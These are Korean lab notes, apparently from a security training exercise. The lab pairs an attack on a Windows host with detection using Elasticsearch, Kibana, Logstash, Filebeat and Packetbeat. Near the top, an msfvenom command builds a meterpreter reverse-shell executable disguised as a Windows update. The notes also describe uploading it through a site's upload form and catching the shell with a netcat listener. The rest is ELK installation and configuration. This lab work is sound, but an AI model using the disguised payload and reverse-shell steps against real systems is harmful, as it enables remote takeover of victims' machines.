미션1
해커로 부터 오는 이메일 정상화 시키기
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=100.100.100.1 LPORT=7777 -b "\x00" -f exe -o /home/kali/windows_update_20250114001.exe

미션2
윈도우 원격연결 활성화 시키기
미션3
lms.st.kr 이라는 사이트가 정상적으로 운영되도록 설정할것

업로드 사이트에서는 enctype="multipart/form-data" 반드시 들어가야한다
파일을 업로드하고 악성파일을 실행
공격자는
nc -nlvp 7777 로 포트를 열어두고
피해자는 악성 파일을 실행

칼리에서 윈도우 연결 가능하도록 설정하기
apt install 

ELK를 이용한 침투 흔적을 찾아라
elasticsearch : 9200
/etc/elasticsearch/elasticsearch.yml
network 0.0.0.0으로 허용
bootstrap discovery, cluster부분 허용
systemctl start elasticsearch
curl -X GET "localhost:9200"

kibana : 5601
systemctl start kibana
logstash : 5044

메인서버
beats설치
패킷beats 설치
파일beats 설치

네트워크 흔적
로그 흔적

curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch |sudo gpg --dearmor -o /usr/share/keyrings/elastic.gpg
echo "deb [signed-by=/usr/share/keyrings/elastic.gpg] https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
sudo apt update
sudo apt -y install filebeat
sudo apt -y install packetbeat

/etc/filebeat/filebeat.yml
/etc/packetbeat/packetbeat.yml

logstah
/etc/logstash
vi input.conf
vi output.conf
테스트
sudo -u logstash /usr/share/logstash/bin/logstash --path.settings /etc/logstash -t